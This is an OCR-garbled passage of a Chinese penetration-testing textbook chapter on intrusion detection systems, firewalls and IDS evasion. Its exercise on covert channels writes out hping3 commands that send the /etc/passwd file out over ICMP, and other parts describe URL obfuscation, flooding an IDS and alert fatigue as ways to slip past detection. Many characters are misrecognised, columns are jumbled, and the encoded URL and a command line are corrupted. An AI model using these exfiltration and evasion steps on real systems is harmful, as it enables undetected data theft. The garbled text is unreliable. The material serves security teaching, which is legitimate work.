是 一 种 基于 硬件 或 软件 、 用 于 监控 网 络 流量 的 设备 。(NIDS 中 的 ) 传 感 器 将 分 析 网 络 中 传输 
的 数据 包 ， 以 确定 它们 的 特征 是 恶意 的 还 是 善意 的 。 理 想 情 况 下 ， 应 将 传感器 放置 在 承载 
大 部 分 流量 的 线路 中 。 

实际 上 ，NIDS 在 设计 和 部 普 位 置 两 方面 都 属于 网 络 的 最 初 防线 之 一 。 当 流量 进入 网 
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络 时 ，NIDS 将 其 与 某 个 威胁 数据 集 或 流量 模型 进行 比较 ， 以 查找 其 中 存在 的 已 知 问题 、 
特征 数据 或 其 他 可 能 是 实际 攻击 的 活动 。NIDS 可 以 检测 各 种 攻击 ， 包 括 拒绝 服务 攻击 、 
病毒 、 晴 虫 和 有 害 垃 圾 邮件 以 及 许多 其 他 类 型 的 网 络 层次 的 威胁 。 当 遇 到 恶意 或 可 疑 的 活 
动 时 ，(NIDS) 通 常会 记录 ， 并 且 可 能 会 癌 负 责 监控 (网 络 ) 环 境 的 人 员 发 送 警 报 。 一 个 部 署 
在 小 型 网 络 中 的 NIDS 如 图 11.1 所 示 。 


[互联 网 ， 


DNS 服务 器 
图 11.1 NIDS 的 部 署 位 置 

为 使 上 述 过 程 生效 ， 除 NIDS 设 备 外 ， 还 需要 以 下 几 个 组 件 : 

传感器 (Senson: 网 络 监 视 组 件 ， 该 组 件 使 用 以 混杂 模式 运行 的 网 卡 ， 检 查 网 络 上 
的 所 有 流量 。 对 于 NIDS 而 言 ， 许 多 系统 将 配备 可 部 署 于 关键 资源 和 网 段 的 传感器 生态 系 
统 ， 从 而 可 进行 广泛 的 监控 。 在 IDS 将 其 传感器 网 络 部 署 到 环境 中 后 ， 就 能 形成 一 个 非常 
健壮 的 监控 解决 方案 ， 检 测 攻击 ， 并 在 攻击 者 有 机 会 大 显 喘 手 前 ， 通 知 系统 所 有 者 。 

规则 引擎 (Rules Engine): 系统 中 负责 将 网 络 流量 与 一 组 已 知 的 特征 (或 称 规则 ) 进 行 
比较 ， 用 以 检测 攻击 的 部 分 。 

监控 控制 台 (Monitoring Console): 通常 是 一 个 基于 软件 应 用 程序 或 硬件 设备 的 系 

统 ， 可 以 显示 监视 的 活动 ， 和 标记 为 可 疑 的 活动 的 相关 通知 


> 由 SourceFire 开 发 的 。 和 信息 。 大 多 数 情况 下 ， 该 界面 是 基于 软件 的 ， 并 且 安 装 在 
Cisco Snort 是 可 用 NIDS 中 


最 第 见 的 。Snort 确 实 很 ali | _ 

受 欢 迎 ， 因 为 它 高 度 可 定 网 络 入 侵 检 测 系 统 还 可 以 根据 其 发 现 的 威胁 进行 学 习 。 
制 ， 有 良好 的 文档 , 可 扩 ”在 消息 在 网 络 中 被 阻 断 的 同时 ， 将 把 消息 添加 到 对 未 来 潜在 
展 ， 并 且 免 费 。 威胁 的 啊 应 树 中 。 这 样 可 以 确保 将 新 的 病毒 、 网 络 攻 击 或 其 


他 可 疑 行为 添加 到 检测 系统 数据 库 中 ， 从 而 阻止 不 民 活 动 。 
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11.1.2 网络 检测 引 黎 的 分 类 


NIDS 将 检测 并 判断 行为 是 恶意 行为 或 符合 已 知 模式 的 行为 。 在 系统 运行 中 ， 可 以 使 
用 两 种 机 制 中 的 其 中 一 种 或 同时 使 用 两 种 机 制 ， 而 每 种 机 制 都 具有 其 优点 及 不 足 。 


基于 特征 码 的 检测 
使 用 此 方法 的 IDS 将 使 用 一 个 已 知 攻击 类 型 的 数据 库 ， 就 像 防 病毒 软件 使 用 已 知 病毒 
和 肾 虫 的 数据 库 一 样 。 在 IDS 运 行 并 开始 根据 数据 库 分 析 流 量 后 ， 好 戏台 开场 了 。 如 果 任 
何 活动 和 特征 码 文 件 中 的 模式 相 匹配 ， 则 会 触发 警报 ， 然 后 管理 员 即 可 选择 他 们 认为 合适 
的 啊 应 。 
特征 码 识 别 在 发 现 已 知 的 攻击 模式 方面 非常 出 色 ， 但 对 任何 未 知 的 攻击 特征 效果 很 
差 。 此 外 ， 与 攻击 无 关 的 其 他 流量 可 能 会 触发 所 谓 的 误 报 报 警 。 
@ 随 着 特征 码 数 据 库 大 小 的 增加 ， 分 析 流 量 所 需 的 时 间 也 将 会 增加 ， 从 而 导致 性 能 
的 下 降 。 在 有 非常 大 量 的 流量 通过 IDS， 同 时 性 能 需求 已 经 超出 负载 的 情况 下 ， 可 
能 无 法 正确 屏蔽 某 些 恶意 流量 。 
@ 攻击 的 演化 和 小 变化 可 能 导致 单 次 攻击 需要 多 个 特征 码 进行 防御 。 攻 击 代 码 仅 仅 
更 改 一 位 就 可 能 导致 需要 创建 一 个 新 的 特征 码 。 


基于 和 寞 常 的 检测 
在 该 检测 系统 中 ， 通 过 对 网 络 上 的 流量 进行 一 段 时 间 的 分 析 ， 或 者 由 系统 所 有 者 目 
行 设 定 一 些 模式 ， 创 建 一 个 基线 。 这 些 基线 用 于 匹配 与 识别 网 络 异 第 活动 。 在 系统 调整 完 
成 ， 准 备 束 绪 后 ， 即 可 “开启 ” 它 ， 并 开始 就 其 检测 到 的 任何 超出 基线 的 活动 发 送 殴 报 。 
@ 该 系统 需要 一 个 正常 网 络 活动 的 模型 ， 以 将 其 与 所 分 析 的 流量 进行 比较 。 该 模型 
必须 尽 可 能 准确 ， 因 为 不 正确 或 不 完整 的 模型 很 容易 导致 虚假 或 误导 性 的 结果 。 
IDS 应 了 解 所 监视 网 络 上 正 第 流量 是 怎样 的 。 应 分 别 对 网 络 流量 高 峰 时 段 一 一 通 第 
是 在 早晨 ， 大 部 分 用 户 开 始 上 班 、 检 查 电子 邮件 和 其 他 信息 时 一 和 大 多 数 员 工 
离开 、 网 络 活动 很 少 的 流量 低谷 时 段 建立 基线 。 
@ 如 果 IDS 系 统 没有 彻底 针对 网 络 上 正常 的 行为 进行 “训练 ”， 那 么 检测 中 就 很 容 
易 出 现 误 报 和 洗 报 的 问题 。 


协议 异常 检测 
这 种 检测 方法 是 基于 某 个 特定 协议 的 已 知 规则 。 为 了 判定 存在 何 种 异常 ， 系 统 使 用 茶 
个 协议 的 已 知 规范 ， 然 后 将 其 用 作对 比 流量 的 模型 。 因 此 ， 通 过 应 用 该 系统 ， 有 可 能 在 新 
的 攻击 成 为 重大 威胁 并 蔓延 之 前 发 现 它们 。 
@ 此 方法 可 以 检测 新 的 攻击 ， 能 够 先 其 他 方法 一 步 ， 检 测 到 相同 的 活动 并 警告 管 
理 员 。 
@ 检测 方法 依赖 于 协议 的 使 用 或 误 用 ， 而 非 不 断 演化 的 攻击 方法 。 
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@ 此 方法 不 需要 特征 码 更 新 。 
@ 该 关 型 系统 中 的 警报 通 币 与 其 他 系统 的 警报 不 同 ， 因 此 应 该 查阅 制造 商 提供 的 指 
南 以 获得 参考 。 


11.1.3 ”基于 主机 的 入 侵 检 测 


基于 主机 的 入 侵 检测 系统 (HIDS) 部 普 在 一 个 独立 的 系统 上 。HIDS 将 仅 监 视 一 个 系统 
中 活动 ， 并 且 通 常会 部 署 在 诸如 域 控制 器 或 Web 服 务 器 之 类 极其 重要 的 系统 上 。HIDS 也 可 
能 部 署 在 任何 服务 器 ， 有 时 还 包括 其 他 非 服 务 器 系统 上 。 该 类 型 的 检测 系统 擅长 检测 系 
统 误 用 以 及 通常 称 之 为 内 部 滤 用 的 行为 。 由 于 它们 在 主机 上 的 人 位置， 它们 实际 上 接近 通 
过 身份 验证 的 用 户 自 身 。HIDS 通 常 在 Windows 平 台 上 可 用 ， 但 也 可 在 Linux 和 Unix 系 统 上 
找到 。 

一 个 运作 正常 的 HIDS 应 能 跟 躁 系 统 状态 ， 并 检测 流量 或 其 他 活动 的 变化 。HIDS 可 以 
监控 的 活动 取决 于 具体 系统 ， 可 能 包括 以 下 内 容 : 

@ 权限 滥用 
自 改 日 志 
登录 失败 
非 计 划 的 重新 局 动 
安装 软件 
可 疑 的 入 站 流量 
可 疑 的 进程 
更 改 文件 
对 应 用 程序 的 请 求 
访问 API 

从 某 种 意义 上 而 言 ， 许 多 用 户 已 经 以 防 病毒 程序 和 安全 套件 的 形式 在 其 系统 中 安装 了 
HIDS。 这 些 程序 通常 具备 监视 系统 状态 的 能 力 ， 并 花费 大 量 时 间 检 查 计算 机 内 各 个 实体 
的 活动 ， 以 及 某 个 程序 是 否 应 该 访问 系统 资源 。 但 需要 说 记 的 是 ， 许 多 包含 此 功能 的 消费 
级 安全 应 用 程序 与 企业 或 企业 系统 不 在 一 个 档次 上 。 


11.1.4 入侵 防御 系统 


入 侵 防 御 系 统 (Intrusion Prevention System，IPS) 是 IDS 的 一 个 “ 近 支 表亲 ”。 虽 然 IDS 
确实 提供 警报 及 与 NIDS 相 同 的 功能 ， 但 是 它们 的 “功能 表 ” 中 提供 了 额外 的 用 于 阻止 攻 
击 的 功能 层次 。NIDS 是 被 动 的 ， 与 之 相对 ，IPS 则 将 在 检测 到 攻击 活动 时 主动 响应 。IPS 
将 根据 其 已 具备 的 规则 和 配置 ， 记 录 、 阻 止 并 报告 被 检测 为 恶意 的 内 容 。 以 下 是 一 些 不 同 
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形式 的 入 侵 防御 系统 : 


基于 网 络 的 入 侵 防 御 系 统 (Network-Based Intrusion Prevention System ，NIPS) 
通过 分 析 协 议 活动 ， 监 控 整 个 网 络 的 可 疑 流量 。 


无 线 入 侵 防 御 系 统 (Wireless Intrusion Prevention System ，WIPS) 
通过 分 析 无 线 网 络 协议 ， 监 控 无 线 网 络 中 的 可 疑 流 量 。 


网 络 行为 分 析 (Network Behavior Analysis ，NBA) 
检查 网 络 流量 以 识别 产生 异常 流量 的 威胁 ， 例 如 分 布 式 拒绝 服务 (DDoS) 攻 击 、 某 些 
形式 的 恶意 软件 以 及 违反 策略 的 行为 。 


基于 主机 的 入 侵 防 御 系 统 (Host-Based Intrusion Prevention System ，HIPS) 
通过 分 析 在 该 主机 内 发 生 的 事件 ， 监 视 单个 主机 的 可 疑 活动 。 


有 一 些 事情 可 能 会 导致 生成 警报 。 本 节 列 出 的 活动 并 不 一 定 提示 发 生 了 攻击 ， 但 如 果 
IDS 做 出 了 标示 ， 仍 然 应 该 进行 调查 。 


11.2.1 主机 系统 入 侵 


这 些 迹象 可 能 表明 对 特定 主机 的 入 侵 。 


未 知 文件 、 文 件 属 性 被 更 改 及 /或 系统 文件 更 改 。 

个 明 或 无 法 简单 确定 用 途 的 新 文件 或 文件 夹 。 新 文件 的 出 现 可 能 是 攻击 的 信和 号 ， 
该 攻击 可 能 是 可 复 改 系统 、 甚 至 蔓延 到 该 主机 所 连接 的 网 络 的 悉 意 软件 。 
存在 创建 时 无 记录 的 新 用 户 账 户 。 

新 的 应 用 程序 。 

不 明 原 因 或 异常 的 进出 系统 的 流量 。 

防 病毒 应 用 程序 被 茶 用 。 

防火 墙 软件 被 禁用 。 

未 知 或 不 明 原 因 的 文件 修改 。 

未 知 文件 扩展 名 。 

奇怪 的 文件 名 。 

特权 非 正 常 使 用 。 


同样 ， 说 记 这 份 清单 绝 非 详尽 无 遗 ， 应 只 将 其 视 为 可 能 提示 洲 在 的 攻击 或 破坏 活动 的 


示例 。 请 记 住 ， 这 些 活 动 也 可 能 表明 没有 任何 问题 。 


11.2.2 ”统一 威胁 管理 


在 渗透 测试 中 ， 统 一 威胁 管理 (Unified Threat Management，UTM) 是 一 个 必须 考虑 的 
重要 的 事项 ， 它 是 指使 用 一 种 能 够 执行 通常 由 多 个 独立 服务 或 设备 处 理 的 任务 的 单一 设备 
或 系统 。 

UTM 背 后 的 概念 是 简化 网 络 安 全 措施 的 管理 ， 提 高 效率 。 其 理念 是 ， 通 过 将 几 种 控 
制 机 制 集 成 到 一 个 设备 中 ， 所 有 机 制 的 数据 共享 和 交互 ， 将 比 这 些 设 备 各 自 为 战 时 更 加 有 
效 。 而 且 ， 很 多 此 类 设备 的 用 户 乐 见 只 需要 购买 和 管理 一 台 设 备 而 不 是 多 人 台 设 备 所 市 来 的 
持 有 成 本 降低 。 

通常 可 以 预期 UTM 机 制 有 何 功 能 ? 
防火 墙 
IDS 或 IPS 
防 病毒 软件 
反 恶 意 软 件 
电子 邮件 管理 
代理 
内 容 过 滤器 

这 些 设备 有 多 高 效 ? 它们 可 以 非常 有 效 地 保护 网 络 ， 阻 隅 不 速 之 客 ， 但 还 有 一 些 需 要 
考虑 的 潜在 问题 。 首 先 ， 此 类 设备 是 网 络 的 第 一 道 防 线 ， 因 此 需要 和 仔细 选择 和 配置 这 些 设 
备 ， 以 确保 能 够 提供 恰当 的 保护 ; 第 二 ， 此 类 设备 意味 着 一 个 单 点 故障 ， 因 此 为 预防 它们 
发 生 故 障 ， 应 该 制定 一 个 描述 如 何 处 理 该 问题 的 策略 ， 第 三 ， 由 于 将 多 个 功能 合并 成 单个 
设备 ， 因 此 必须 正确 管理 总 体 的 处 理性 能 和 流量 人 负载， 否则 ，UTM 可 能 在 大 量 的 负载 下 
“屈服 ”。 

从 渗透 测试 的 角度 来 看 ， 这 些 设备 是 一 个 有 趣 的 挑战 。 实 际 上 ， 在 执行 扫描 和 枚 举 
时 ， 必 须 注 意 任何 可 探测 出 隐藏 在 IP 地 址 后 的 UTM 设 备 的 信息 。 注 意 那 些 标识 上 自 喘 的 服 
务 、 寻 找 不 寻 利 的 端口 、 拉 取 banner 信 息 ， 并 以 找到 那些 可 用 于 确定 对 抗 对 象 的 细节 信息 
为 目标 ， 进 行 仔 细 的 侦察 。 在 了 解 设 备 的 特征 后 ， 就 可 以 确定 哪些 技术 能 够 起 作用 或 者 效 
朱 更 好 。 


11.2.3 ”网 络 入 侵 的 措 标 


下 列 种 种 都 是 潜在 网 络 攻击 或 入 侵 的 迹象 : 
@ 增长 且 不 明 原 因 的 网 络 带宽 使 用 
@ 网 络 上 的 系统 上 的 探测 器 或 服务 
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来 自 未 知 来 源 或 非 本 地 TP 的 连接 请 求 
来 自 远程 主机 的 反复 登录 尝试 


铎 释 的 消 妃 


日 志文 件 中 不 明 原 因 或 无 法 
连接 到 非 标准 端口 

异常 流量 

异常 的 流量 模式 

处 于 混杂 模式 的 网 络 适配器 
对 顺序 IP 地 址 的 扫描 

对 连续 范围 端口 的 扫描 

对 DNS 服务 器 的 大 流量 访问 
和 前 文 所 述 的 针对 主机 的 入 侵 一样 ， 这 些 攻击 都 不 一 定 是 攻击 ; 但 如 果 从 NIDS 收 到 
警报 ， 就 应 该 对 其 进行 调查 。 


11.2.4 ”入 侵 的 模糊 迹象 


重要 的 是 要 认识 到 并 不 是 任何 事情 都 是 攻击 的 迹象 ， 因 此 必须 仔细 研究 那些 可 疑 的 
事件 。 
修改 系统 软件 和 配置 文件 
日 志 丢 失 或 具有 不 正确 权限 或 所 有 权 的 日 志 
系统 衣 误 或 重 局 
系统 审计 中 缺失 内 容 
不 熟悉 的 进程 
使 用 未 知 登 录 信息 
在 非 工 作 时 间 登 录 
存在 新 的 用 户 账户 
系统 审计 文件 中 缺失 内 容 
系统 性 能 降低 
个 明 原 因 的 系统 重 司 或 月 温 


11.3 规避 IDS 


作为 一 个 渗透 测试 者 ， 必 须 弄 清楚 如 何 通过 IDS。 幸 运 的 是 ， 有 多 种 可 选 方法 ， 下 面 
将 介绍 几 种。 
当 工 作 在 有 IDS 的 系统 时 ， 一 种 避免 检测 的 有 效 方法 是 采用 对 抗 或 规避 检测 的 技术 。 


当 IDS 丢 弃 了 给 定 主 机 可 以 接受 的 数据 包 时 ， 就 会 及 生 规 避 攻 击 。 如 果 巧 妙 而 谨慎 地 执行 


规避 攻击 ， 就 可 以 攻击 IDS 后 面 的 主机 ， 而 不 会 使 IDS 发 现 ， 或 至 少 无 法 及 时 发 现 。 

规避 攻击 具有 高 度 技 巧 性 ， 但 是 在 欺骗 IDS 方 面 很 有 效 。 这 种 类 型 的 攻击 可 以 通过 以 
各 种 方式 改变 流量 来 完成 ， 例 如 在 字 节 级 别 修改 信息 ， 从 而 去 除 或 丢弃 实际 上 会 提示 或 警 
告 IDS 的 那 部 分 信息 。 通 过 IDS 的 另 一 种 方式 是 利用 IDS 可 能 无 法 处 理 的 协议 中 的 漏洞 或 脆 
弱 性 。 其 例子 之 一 是 使 用 ICMP 数 据 包 携 市 被 称 为 ping 的 消 恩 。 由 于 ping 是 网 络 活动 的 正常 
组 成 部 分 ，IDS 不 会 立即 将 其 标记 为 恶意 的 ， 并 且 很 可 能 会 让 它们 通过 。 


11.3.1 以 IDS 为 目标 


另 一 种 绕 过 IDS 的 方法 是 对 IDS 进 行 拒绝 服务 攻击 。 通 过 消耗 重要 资源 (如 内 存 和 处 理 
器 )， 可 用 于 检测 可 能 是 实际 攻击 的 流量 的 资源 将 减少 。 这 样 ， 不 仅 消 耗 了 重要 的 资源 ， 
而 且 还 可 以 将 实际 的 攻击 隐藏 在 冲击 IDS 的 海量 流量 信息 中 。 

另外 ， 如 果 针 对 IDS 进 行 了 DoS 攻 击 ， 就 会 发 生 有 趣 的 事情 : IDS 工 作 不 正常 或 根本 不 
起 作用 。 要 理解 这 一 点 ， 可 设想 IDS 的 功能 ， 以 及 实现 该 功能 需要 多 少 资源 。IDS 需 要 嗅 
探 流量 并 将 流量 与 规则 进行 比较 ， 执 行 该 流程 需要 大 量 资源 。 如 果 这 些 资源 被 另 一 个 事件 
所 消耗 ， 那 么 就 将 起 到 改变 IDS 行 为 的 效果 。 

当 遭 遇 足 够 大 量 的 流量 冲击 时 ， 某 些 IDS 可 能 会 失效 ， 此 时 它们 可 能 会 进入 一 个 开放 
的 状态 。 这 意味 着 ， 当 因 故 障 进 入 开放 状态 时 ，IDS 将 不 再 执行 其 原 定 的 功能 。 要 使 IDS 
脱离 此 状态 ， 可 能 需要 重 置 IDS， 或 许 它 也 可 能 会 在 攻击 停止 后 恢复 正常 工作 。 


11.3.2 混交 


由 于 IDS 依 赖 于 能 够 分 析 干 扰 性 的 流量 ， 因 此 模糊 (obscuring) 或 泥 清 (obfuscating) 可 能 
是 一 种 有 效 的 规避 技术 。 这 种 技术 依赖 于 以 一 种 IDS 不 能 “领悟 ”或 “理解 ”， 但 目标 可 
以 “领悟 ”或 “理解 ”的 方式 操纵 信息 。 该 操作 可 以 通过 手动 操作 代码 或 通过 使 用 混 消 器 
来 实现 。 

使 用 URL 混 消 是 其 中 一 例 。 例 如 ， 设 想 以 下 URL( 这 是 一 个 虚假 的 URL， 但 它 显 示 了 
攻击 者 可 能 用 以 绕 过 检测 的 方法 ): 

http://www.wiley-test.com/cgi-bin/encode.cgi 

如 果 使 用 在 线 编码 器 处 理 该 URL， 编 码 器 会 将 其 从 当前 格式 转换 为 如 下 所 示 的 十 六 进 
制 格式 : 

http$3A%2F%2Fwww.wiley-test.coms$2Fcgi-bing$2Fencode.cgi 

虽然 此 URL 仍 然 可 读 ， 但 一 些 NIDS 可 能 无 法 转换 十 六 进 制 代码 ， 从 而 错过 了 可 能 本 
质 上 恶意 的 内 容 。 这 意味 着 NIDS 可 能 “在 眼皮 底下 ”错过 了 一 个 字面 上 “正常 ”的 恶意 
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内 容 ， 让 它 未 受 任 何 质疑 地 通过 。 


11.3.3 ”利用 隐 北 通道 


隐蔽 通道 (covert channelJ) 和 是 一 种 市 外 传输 的 方式 。 这 些 通道 使 用 系统 的 原始 设计 者 无 
意 或 计划 外 的 方法 和 机 制 ， 因 此 通常 不 受 监控 。 

使 用 隐 通 道 的 一 种 方式 是 使 用 隐 写 术 (steganography) 将 信息 隐 蕊 在 男 一 个 看 似 无 害 
的 信息 中 ， 例 如 图 像 或 其 他 数据 。 隐 写 术 固然 有 趣 ， 在 此 介绍 另 一 种 方式 : 使 用 ICMP 和 
hping3。 


练习 11.1: 使 用 hping3 创 建 数 据 包 

hping3 是 一 个 用 于 创建 自 定 义 数 据 包 、 运 行 自 定 义 扫 描 和 执行 网 络 诊断 的 实用 程 
序 。 虽然 你 可 能 已 熟悉 使 用 ping 和 其 他 网 络 程 序 ， 但 可 能 还 从 未 使 用 它们 传输 过 文 
件 。 下 面 介 绍 hping3 如 何 做 到 这 一 点 。 

和 完 ， 在 接收 端 系 统 上 运行 以 下 命令 : 

hping3 -1 <ip address> -9 signature -I 

该 命令 告诉 hping， 在 特定 的 人 P 地 址 上 发 送 一 个 ICMP 数 据 包 (-1)。 使 用 HPING3 监 
听 模 式 选项 ，hping3 会 等 得 一 个 包含 signature( 签 名 信息 ) 的 数据 包 ， 并 转 储 从 签名 尾 
到 数据 包 尾 的 信息 。 例 如 ， 如 果 hping3 -listen TEST 接收 到 一 个 包含 234-09sdflkjs45- 
TESThello world 的 数据 包 ， 它 将 显示 hello world。 最 后 ，-I 标 志 设 定 hping3 在 监听 基 
个 特定 的 接口 上 ， 对 本 例 而 言 是 eth0。 

以 下 则 是 发 送 部 分 : 

hping3 -1 -e signature -E /etc/ 

passwd -qd 2000 

在 第 二 个 例子 中 ， 有 两 个 标志 (-E) 和 (-d) 是 不 同 的 。-E 告 诉 hping 获 取 指 定 文件 的 
内 容 ， 并 使 用 它们 填充 数据 包 。-d 选 项 设置 发 送 数据 包 的 大 小 。 

在 发 出 此 命令 后 ， 将 使 用 ICMP 传 输 该 文件 。 这 种 方法 具备 使 用 ping( 这 是 网 络 上 
的 常见 事件 ) 来 承载 隐藏 的 有 效 载 集 的 优点 。 如 果 媚 慎 地 操作 ， 可 能 很 难 甚至 无 法 对 
其 进行 检测 。 


11.3.4 “ 狠 来 了 


你 是 否 听 说 过 在 停车 场 或 家 附近 的 汽车 报警 器 被 触发 ， 发 出 奇怪 而 疯狂 的 噪音 ?这 些 
警报 的 目的 是 ， 在 有 人 试图 盗 取 车 辆 时 ， 引 起 对 该 车 的 注意 。 但 实际 上 ， 你 曾 见 过 有 多 少 
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人 在 意 该 警报 ? 如 果 你 的 经 历 和 笔者 一 样 ， 那 么 答案 应 该 是 : 不 多 。 如 果 IDS 以 同样 的 频 
率 ， 过 于 频繁 地 发 出 警报 ， 则 很 容易 导致 系统 所 有 者 感到 厌烦 ， 并 不 再 重视 ， 这 意味 着 攻 
击 被 系统 管理 员 所 捕捉 到 的 概率 很 低 。 

攻击 者 可 以 针对 IDS 进 行 实际 攻击 ， 使 其 对 该 活动 做 出 反应 并 提醒 系统 所 有 者 。 如 果 
反复 进行 该 操作 ， 系 统 所 有 者 将 最 终 看 到 充满 了 “ 正 发 生 攻击 ”信息 的 日 志文 件 ， 但 没有 
其 他 证 据 表明 存在 攻击 。 最 终 ， 系 统 所 有 者 可 能 会 开始 忽视 这 些 警 告 ， 或 者 认为 是 误 报 ， 
并 变 得 懈 于 观察 。 这 样 ， 攻 击 者 就 可 以 无 障碍 地 打击 他 们 的 实际 目标 。 


11.3.5 ”通过 加 密 进 行规 避 


前 文 介绍 过 的 一 些 技术 在 此 也 值得 重 提 : 加密。 在 实践 中 ， 一 些 IDS 实 际 上 无 法 处 理 
加 密 的 流量 ， 因 此 会 放 其 通过 。 事 实 上 ， 加 密 是 在 所 有 的 规避 方法 中 最 有 效 的 一 个 。 


11.4 攻破 防火 场 


当然 ， 任 何 一 种 防护 解决 方案 都 不 应 单打 独 斗 ， 而 防火 墙 则 是 男 一 种 网 络 的 保护 装 
置 。 防 火 墙 是 不 同 信 任 级 别 区 域 之 间 的 屏障 ， 它 选择 性 地 允许 流量 通过 ， 同 时 丢弃 其 他 所 
有 信息 。 在 其 最 简单 的 形式 和 实现 中 ， 防 火 墙 是 可 信和 网 络 和 不 可 信 网 络 之 间 的 屏障 ， 但 实 
际 上 会 复杂 得 多 。 

在 建筑 领域 中 ， 防 火场 是 指 建筑 物 区 域 之 间 不 可 燃 的 屏障 ， 可 防止 火灾 在 建筑 物 中 蔓 
延 。 通 常 可 在 建筑 物 中 的 区 域 之 间 找 到 防火 墙 ， 如 家 话 住 宅 的 车 库 与 其 余部 分 之 间 。 

在 技术 业务 中 ， 防 火 墙 执 行 的 功能 并 没有 太 大 的 不 同 。 与 在 建筑 物 中 的 防火 墙 非常 类 
似 ， 网 络 防火 墙 可 以 作为 网 络 之 间或 计算 机 之 间 的 屏障 。 防 火 墙 阻止 或 限制 主机 之 间 的 连 
接 ， 限 制 系统 间 的 相互 暴露 。 没 有 防火 墙 ， 系 统 将 处 于 易 受 攻击 的 状态 ， 从 而 可 能 使 攻击 
者 对 系统 造成 极 大 的 伤害 。 

防火 场 有 两 种 主要 形式 ;人 硬件 和 软件 。 本 书 将 在 稍 后 详细 讨论 这 两 种 形式 ， 但 这 两 种 
形式 均 提 供 了 某 些 设置 过 滤器 以 控制 信息 通过 的 能 力 ， 以 阻止 有 害 的 流量 破坏 系统 。 

防火 墙 只 不 过 是 置 于 网 络 入 口 或 必 经 之 路 上 的 一 组 规则 和 程序 。 与 Intemet 的 主要 连接 
等 网 络 关 口 可 作为 部 署 该 屏障 的 理想 位 置 ， 因 为 进出 网 络 的 流量 必须 流 经 此 处 。 

可 以 将 防火 墙 描述 为 用 于 分 离 所 谓 的 “信任 区 域 ”。 很 显然 ， 该 描述 意味 着 有 两 个 不 
同 的 网 络 或 区 域 ， 各 区 域 有 着 不 同 的 信任 级 别 。 在 这 种 情况 下 ， 防 火 墙 充 当 了 网 络 之 间 的 
一 条 非常 重要 的 分 界线 ， 为 流量 设置 边界 。 

以 下 是 一 些 需 要 注意 的 防火 墙 相关 事项 。 

@ 防火 墙 的 配置 由 公司 自 喘 安全 策略 所 指派 ， 并 应 及 时 更 改 ， 以 适应 公司 的 目标 及 
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持续 的 Intermet 威 胁 ; 

@ 防火 墙 通常 配置 为 仅 允 许 特 定 类 型 的 流量 流入 ， 例 如 电子 邮件 协议 、Web 协 议 或 
远程 访问 协议 ; 

@ 在 选 定 的 情况 下 ， 防 火 墙 还 可 以 作为 一 种 电话 监听 形式 ， 用 于 识别 拨号 接 入 网 络 


@ 防火 墙 中 配置 了 处 理 流量 的 规则 。 有 用 于 进入 网 络 和 流出 网 络 流量 的 规则 ， 完 全 
也 存在 同样 的 流量 允许 通过 一 个 方向 而 不 允许 通过 另 一 个 方 问 的 可 能 ; 
@ 对 于 通过 防火 墙 的 流量 ,防火墙 还 将 充当 路 由 费 ， 帮 助 引导 网 络 之 间 各 类 流量 的 


路 径 选择 ; 

e@ 防火 墙 可 以 根据 多 种 标准 过 滤 流 量 ， 标 准 包括 目的 地 、 来 源 、 协 议 、 内 容 或 应 用 
程序 ; 

@ 在 带 有 恶意 特征 流量 试图 通过 防火 墙 时 ， 可 以 配置 一 个 警报 ， 提 醒 系 统管 理 员 或 
其 他 相关 人 员 。 


11.4.1 防火 场 配置 


并 非 所 有 防火 墙 的 设置 都 相同 ， 不 同 的 设置 取决 于 每 种 不 同情 况 的 需求 及 要 求 。 以 下 
每 种 方法 都 有 一 些 特有 功能 ， 即 使 其 他 方法 提供 同类 功能 ， 方 式 也 不 尽 相 同 。 


堡垒 主机 (Bastion Host) 

堡垒 主机 是 指 流量 经 由 其 进出 网 络 之 处 。 虽 然 有 个 花哨 的 名 字 ， 但 堡垒 主机 实际 上 
是 一 个 计算 机 系统 ， 其 上 承载 的 仅 供 执行 其 定义 的 角色 一 一 在 这 种 情况 下 ， 其 角色 是 保 
护 资 源 免 受 攻 击 。 该 类 型 主机 有 两 个 接口 : 一 个 连接 到 不 可 信 网 络 ， 而 另 一 个 连接 到 可 
信和 网 络 。 


屏蔽 式 子 网 (Screened Subnet) 

该 类 型 的 设置 使 用 具有 三 个 舱 入 式 接 口 的 单一 防火 墙 。 三 个 接口 分 别 连 接 到 互联 网 、 
非 军事 区 (CDMZ)( 稍 后 将 介绍 ) 和 内 部 网 本 身 。 这 种 设置 的 显著 优点 是 ， 每 个 区 域 都 连接 到 
其 自己 的 接口 ， 因 此 区 域 间 彼 此 分 离 。 这 样 做 具有 防止 一 个 区 域 被 攻陷 后 影响 其 他 区 域 的 
优点 。 


多 宿主 防火 墙 (Multihomed Firewall) 

多 宿主 防火 墙 是 一 种 由 承担 实际 物理 防火 墙 功 能 的 单 体 人 硬件 构成 的 防火 墙 ， 但 具有 连 
接 到 多 个 网 络 的 三 个 以 上 网 络 接口 。 

非 军 事 区 (DMZ) 

DMZ 是 组 织 中 公开 和 私有 网 络 之 间 的 一 个 缓冲 区 。 实 际 上 ，DMZ 不 仅 用 作 绥 冲 区 ， 
而 且 还 用 于 管理 公司 希望 公开 开放 ， 但 不 允许 其 直接 访问 公司 内 部 网 络 的 服务 。 
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DMZ 通 过 应 用 防火 墙 构建 ， 将 防火 墙 的 三 个 或 以 上 的 网 络 接口 分 配给 特定 和 角色， 如 
内 部 可 信和 网 络 、DMZ 网 络 和 外 部 不 可 信和 网 络 ( 即 Internet)。 


11.4.2 ”防火 墙 的 类 型 


并 非 所 有 的 防火 场 都 一 样 。 你 必须 了 解 各 种 类 型 的 防火 场 ， 并 理解 各 种 防火 墙 的 工作 
原理 。 


包 过 滤 了 防火墙 (Packet Filtering Firewall) 

这 是 最 基本 的 防火 墙 类 型 ， 工 作 于 OSI 模 型 的 第 3 层 。 在 许多 情况 下 ， 此 类 防火 墙 直 接 
内 置 到 路 由 器 或 类 似 设 备 中 。 这 种 路 由 器 具有 简单 和 速度 快 的 优点 ， 但 缺点 是 它们 不 对 经 
过 的 信息 进行 任何 深入 的 分 析 。 这 种 类 型 的 防火 墙 比 较 数 据 包 的 源 和 目的 地 址 、 协 议和 端 
口 之 类 属性 。 如 条 数据 包 属 性 与 定义 的 规则 不 匹配 ， 则 最 终 会 丢弃 该 数据 包 。 


电路 层 防 火 墙 /网 关 (Circuit-Level Firewall/Gateway) 
任何 属于 此 类 的 防火 墙 都 工作 于 会 话 层 。 此 类 防火 墙 能 够 检测 系统 之 间 的 会 话 是 否 有 
效 。 该 类 型 防火 墙 的 缺点 是 它们 通常 不 过 小 单个 数据 包 、。 


应 用 层 防 火 墙 (Application-Level Firewall) 

